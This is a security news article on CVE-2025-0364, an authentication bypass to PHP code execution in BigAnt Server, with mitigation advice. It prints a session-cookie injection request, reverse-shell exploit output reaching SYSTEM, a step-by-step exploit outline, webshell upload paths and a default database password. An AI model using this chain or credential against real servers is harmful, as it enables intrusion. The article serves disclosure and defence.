Cyber Security News

BigAnt Server 0-Day Vulnerability Lets Attackers Run Malicious Code Remotely

A critical vulnerability in BigAntSoft’s enterprise chat server software has exposed ~50 internet-facing systems to unauthenticated remote code execution attacks.

Designated CVE-2025-0364, this exploit chain enables attackers to bypass authentication protocols, create administrative accounts, and execute malicious PHP code on vulnerable servers running BigAnt Server v5.6.06 and earlier.

CVE-2025-0364: Authentication Bypass to PHP Code Execution

The vulnerability leverages misconfigured SaaS organization registration features in BigAnt Server’s web interface.

Attackers bypass CAPTCHA verification and craft administrative accounts through the /Home/Saas/reg_email_post endpoint, exploiting weak session management in the ThinkPHP framework. 

Once registered, attackers manipulate session cookies to hijack unauthenticated access to backend systems:

// Example of session hijacking via forced SaaS_ID assignment 

GET /index.php/Home/Login/index.html HTTP/1.1 

Cookie: saas=attacker_controlled_value 

Host: vulnerable-server.com

This cookie injection grants access to the administrative Cloud Disk Add-in, where attackers upload PHP webshells to paths like /data/[saas_id]/pan/[uuid]/YYYY-MM-DD/malicious.php. 

The server executes these files without authentication checks, enabling system-level command execution.

Security researchers at VulnCheck demonstrated this with a reverse shell payload:

# Exploit execution output showing SYSTEM privileges 

$ ./cve-2025-0364_linux-amd64 -rhost 10.0.0.104 -lhost 10.0.1.10 

[+] Requesting payload at: http://10.0.0.104:8000/data/[saas_id]/pan/[uuid]/2025-01-09/JQsaYCKEOu.php 

[+] Shell from 10.0.0.104:51690 

C:\Program Files\BigAntSoft\IM Console> whoami 

nt authority\system

Exploit Chain Analysis

The attack requires 10 sequential HTTP requests:

  1. CAPTCHA Bypass: Solve 4-character CAPTCHA hashes like 652def5853ff0030a259b30af8e7facb_6e58b283a2a66e4db833ac2547019a30
  2. SaaS Registration: POST request to /Home/Saas/reg_email_post with organization data
  3. Session Manipulation: Assign session to attacker-controlled SaaS via cookie header
  4. UUID Leak: Retrieve SaaS_ID from /demo page debug outputs
  5. Service Activation: Activate organization with stolen UUID
  6. Cloud Disk Auth: Authenticate using auto-generated admin credentials
  7. File Upload: Write PHP payload to cloud drive directories
  8. Payload Trigger: HTTP GET request to uploaded PHP path

Notably, the system stores SaaS credentials in plaintext within the sys_saas MySQL table using default credentials (root:www.upsoft01.com), exposing all organizational accounts if databases are compromised.

Mitigation and Impact

While BigAntSoft has not released an official patch, administrators should:

  1. Disable SaaS registration via .htaccess rules blocking /Home/Saas/ endpoints
  2. Audit sys_saas table for unauthorized entries
  3. Remove PHP execution permissions from /data/ directories

VulnCheck’s exploit (GitHub: vulncheck-oss/cve-2025-0364) has accelerated attacks, with 15 servers compromised in March 2025 alone.

This vulnerability highlights systemic risks in enterprise chat platforms that combine unsecured registration workflows with privileged file management systems.

As of March 4, 2025, 72% of exposed BigAnt servers remain unpatched.

Are you from SOC/DFIR Teams? – Analyse Malware Incidents & get live Access with ANY.RUN -> Start Now for Free.

Divya

Divya is a Senior Journalist at GBhackers covering Cyber Attacks, Threats, Breaches, Vulnerabilities and other happenings in the cyber world.

Recent Posts

CISA Warns of Active Exploitation of Microsoft Windows Win32k Vulnerability

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added CVE-2018-8639, a decade-old Microsoft Windows privilege…

3 minutes ago

Update Alert: Google Warns of Critical Android Vulnerabilities Under Exploit

Google’s March 2025 Android Security Bulletin has unveiled two critical vulnerabilities—CVE-2024-43093 and CVE-2024-50302—currently under limited,…

2 hours ago

Bubba AI, Inc. is Launching Comp AI to Help 100,000 Startups Get SOC 2 Compliant by 2032.

With the growing importance of security compliance for startups, more companies are seeking to achieve…

4 hours ago

IBM Storage Virtualize Flaws Allow Remote Code Execution

Two critical security flaws in IBM Storage Virtualize products could enable attackers to bypass authentication…

5 hours ago

Progress WhatsUp Gold Path Traversal Vulnerability Exposes Systems to Remote code Execution

A newly disclosed path traversal vulnerability (CVE-2024-4885) in Progress Software’s WhatsUp Gold network monitoring solution…

5 hours ago

CISA Alerts on Active Exploitation of Cisco Small Business Router Flaw

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) issued an urgent warning on March 3,…

6 hours ago